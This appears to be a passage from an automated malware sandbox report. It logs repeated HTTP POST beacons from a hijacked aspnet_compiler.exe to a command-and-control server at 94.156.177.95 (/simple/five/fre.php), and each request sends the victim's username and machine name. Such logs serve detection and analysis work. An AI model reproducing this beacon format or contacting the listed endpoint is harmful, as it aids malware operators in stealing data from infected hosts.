                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.54993194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:07.366914988 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:07.371818066 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:08.362751007 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:08 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.54993594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:08.522666931 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:08.527825117 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:09.478656054 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:09 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.54994194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:09.641161919 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:09.646080971 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:10.588184118 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:10 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.54994794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:10.733527899 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:10.738507986 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:11.696425915 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:11 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.54995294.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:11.904120922 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:11.909050941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:12.850373983 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:12 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.54995994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:13.027446985 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:13.033206940 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:13.986828089 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:13 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.54996594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:14.138925076 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:14.143908978 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:15.095793962 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:14 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.54997194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:15.256006002 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:15.260992050 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:16.190433025 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:16 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.54997694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:16.349315882 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:16.354360104 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:17.330138922 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:17 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.54998494.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:17.483021975 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:17.488008976 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:18.442526102 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:18 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.54999194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:18.643546104 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:18.648637056 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:19.617989063 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:19 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.54999994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:19.766031981 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:19.770914078 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:20.776741982 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:20 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    44192.168.2.55000694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:21.177195072 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:21.183193922 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:22.095532894 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:21 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    45192.168.2.55001494.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:22.271795988 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:22.276771069 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:23.204288960 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:23 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    46192.168.2.55002294.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:23.381226063 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:23.386904955 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:24.317574978 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:24 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    47192.168.2.55002394.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:24.481081009 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:24.486068010 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:26.041918993 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:25 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    48192.168.2.55002494.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:26.193200111 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
